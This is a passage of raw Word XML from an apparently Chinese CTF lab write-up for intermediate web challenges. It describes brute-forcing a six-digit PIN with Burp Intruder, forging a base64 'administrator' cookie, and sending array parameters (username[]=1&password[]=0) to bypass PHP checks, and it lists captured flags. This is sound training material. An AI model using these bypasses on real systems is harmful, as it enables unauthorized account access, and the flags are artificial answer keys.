      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hackbar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>插件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099717B" w:rsidRPr="0099717B" w:rsidRDefault="0099717B" w:rsidP="0099717B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760180" cy="1912717"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="112" name="图片 112" descr="http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35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http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35-35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722" cy="192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5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：勾选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Post data,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在弹出的文本框里输入解出的内容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点击执行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Execute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，得到本题的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99717B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99717B" w:rsidRPr="0099717B" w:rsidRDefault="00666AB2" w:rsidP="0099717B">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="405" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r w:rsidR="0099717B" w:rsidRPr="0099717B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4183C4"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://60.10.10.21/198/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0099717B" w:rsidRPr="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0099717B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5503176" cy="2436139"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="111" name="图片 111" descr="http://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35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://192.168.109.235/storage/images/35fa7f7a7834ceb8e3a71f52a2236271/2018-12-27-15-35-43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399" cy="244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1DC" w:rsidRDefault="006B71DC" w:rsidP="006B71DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00207ABC" w:rsidRDefault="00207ABC" w:rsidP="00207ABC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00207ABC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fa1b865d9280d4a488afa30fd60216e7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B71DC" w:rsidRDefault="006B71DC" w:rsidP="006B71DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B71DC" w:rsidRDefault="006B71DC" w:rsidP="006B71DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B71DC" w:rsidRDefault="006B71DC" w:rsidP="006B71DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B71DC" w:rsidRDefault="006B71DC" w:rsidP="006B71DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B71DC" w:rsidRDefault="006B71DC" w:rsidP="006B71DC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C24752" w:rsidRDefault="00C24752" w:rsidP="00C24752">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00883C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WEB-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00883C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>级</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00B82FF2" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2"/>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捡到银行卡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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CE352C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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>爆破密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2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http://10.2.0.54/22,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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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CE352C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lastRenderedPageBreak/>
        <w:t>Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2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使用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burp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爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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E352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CE352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CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;http://10.10.23.105/22/&gt;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CE352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CE352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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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125887" cy="3669385"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="116" name="图片 116" descr="http://192.168.109.235/storage/images/20181207143018JX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81207143018JXs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670" cy="3688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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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E352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CE352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看是银行卡是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6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位密码且为数字，可以用爆破，设置浏览器代理，打开选项，高级，网络</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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356800" cy="2059983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117" name="图片 117" descr="http://192.168.109.235/storage/images/20181207143026O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20181207143026O79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253" cy="2081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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352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CE352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设置代理，如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burp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的代理一致</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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3037402" cy="1255849"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="118" name="图片 118" descr="http://192.168.109.235/storage/images/20181207143031ev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20181207143031evT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179" cy="126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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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E352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CE352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打开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burp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抓取数据包，发送到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intruder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进行爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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016022" cy="2336370"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="119" name="图片 119" descr="http://192.168.109.235/storage/images/201812071430380I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201812071430380IB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29" cy="234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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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E352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CE352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将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password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字段加爆破符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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311497" cy="3129689"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="120" name="图片 120" descr="http://192.168.109.235/storage/images/20181207143043i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20181207143043iOc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445" cy="314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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352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设置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type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为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number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，因为是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6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位密码，所以范围从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100000-999999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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001729" cy="3707647"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="121" name="图片 121" descr="http://192.168.109.235/storage/images/20181207143049uX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92.168.109.235/storage/images/20181207143049uX6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499" cy="3723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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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E352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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352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经过漫长的等待，成功爆破出正确数值</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>523986</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352C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47765" cy="3316637"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122" name="图片 122" descr="http://192.168.109.235/storage/images/20181207143058b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92.168.109.235/storage/images/20181207143058bt1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671" cy="3351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F2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF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E352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E352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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352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查看页面，找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE352C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B82FF2" w:rsidRPr="00CE352C" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2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E352C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124899" cy="3238984"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="123" name="图片 123" descr="http://192.168.109.235/storage/images/20181207143104fG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192.168.109.235/storage/images/20181207143104fGW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069" cy="3256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FF2" w:rsidRDefault="00B82FF2" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00B14DDA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xmKFDtmSXWROqkyOIyDl0Ybz5n6lcBd0yMH46CS0qMxLemM67gkoT0ni2J8zyW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B82FF2" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2"/>
    <w:p w:rsidR="00B82FF2" w:rsidRDefault="00B82FF2" w:rsidP="00B82FF2"/>
    <w:p w:rsidR="00DC19AD" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC19AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你确定你是管理员吗</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>你确定你是管理员吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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C04ACC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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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04ACC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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>username[]=1&amp;password[]=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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04ACC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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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C04ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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04ACC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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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http://10.2.0.63/46,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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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C04ACC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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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post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提交数据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username[]=1&amp;password[]=0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，将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cookies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中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user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的值改为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YWRtaW5pc3RyYXRvcg==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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C04AC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04AC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C04AC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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC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&lt;http://10.137.0.96/46/&gt;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C04AC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C04AC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地址以真实获取的为准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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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8001000" cy="3533775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="124" name="图片 124" descr="http://192.168.109.235/storage/images/20181210153600v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81210153600vTA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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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C04AC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04AC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C04AC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需要安装附加组件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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2905125" cy="5886450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="125" name="图片 125" descr="http://192.168.109.235/storage/images/20181210153349Qy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20181210153349QyM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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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C04AC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04AC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C04AC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安装并启用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Hacker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，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Firebug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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772025" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="126" name="图片 126" descr="http://192.168.109.235/storage/images/201812101533565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201812101533565Mi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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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8353425" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="127" name="图片 127" descr="http://192.168.109.235/storage/images/20181210153401E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20181210153401ERN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34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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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C04AC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04AC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C04AC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F9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打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Hackber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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post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传递数组，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username[]=1&amp;password[]=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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755402" cy="3485666"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="128" name="图片 128" descr="http://192.168.109.235/storage/images/20181210153703Z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20181210153703ZAx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17" cy="34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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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C04AC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04AC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C04AC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不是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administrator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，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F12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打开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firebug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，修改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cookies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值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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006548" cy="1107322"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="129" name="图片 129" descr="http://192.168.109.235/storage/images/20181210153903YB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92.168.109.235/storage/images/20181210153903YBi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709" cy="115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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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C04AC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04AC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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04AC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输入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加密过的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administrator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，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YWRtaW5pc3RyYXRvcg==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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199681" cy="2817447"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="130" name="图片 130" descr="http://192.168.109.235/storage/images/20181210153955p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92.168.109.235/storage/images/20181210153955pmS.pn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471" cy="2836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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19A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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04AC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04AC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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04AC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刷新网页，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00C04ACC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DC19AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD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12207" cy="3165529"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="131" name="图片 131" descr="http://192.168.109.235/storage/images/20181210154026n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192.168.109.235/storage/images/20181210154026nUi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849" cy="318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9AD" w:rsidRPr="00C04ACC" w:rsidRDefault="00DC19AD" w:rsidP="00B7126C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00001A60">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8666aaffad843f605a97f24aee4654c5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC19AD" w:rsidRPr="00DC19AD" w:rsidRDefault="00DC19AD" w:rsidP="00DC19AD"/>
    <w:p w:rsidR="00C24752" w:rsidRDefault="00FA630B" w:rsidP="00FA630B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA630B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕绕绕！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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33AD3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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630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33AD3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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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333AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00333AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数传入数组报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630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33AD3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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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333AD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630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33AD3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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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http://10.2.0.50/42,</w:t>
      </w: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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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33AD3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FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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MD5</w:t>
      </w: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函数传入数组报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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</w:t>
      </w:r>
      <w:r w:rsidRPr="00333AD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33AD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333AD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打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00333AD3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&lt;http://10.137.0.81/42/&gt;</w:t>
      </w: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IP</w:t>
      </w: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地址以真实获取的为准）访问如图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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924455" cy="3403977"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="132" name="图片 132" descr="http://192.168.109.235/storage/images/201812101452433q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812101452433qG.pn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610" cy="341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0B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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333AD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33AD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333AD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分析代码，可知需要给</w:t>
      </w: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name</w:t>
      </w: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，</w:t>
      </w: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password</w:t>
      </w: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，</w:t>
      </w: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id</w:t>
      </w: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传值，打开火狐的附件管理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA630B" w:rsidRPr="00333AD3" w:rsidRDefault="00FA630B" w:rsidP="00FA630B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2204089" cy="4263648"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
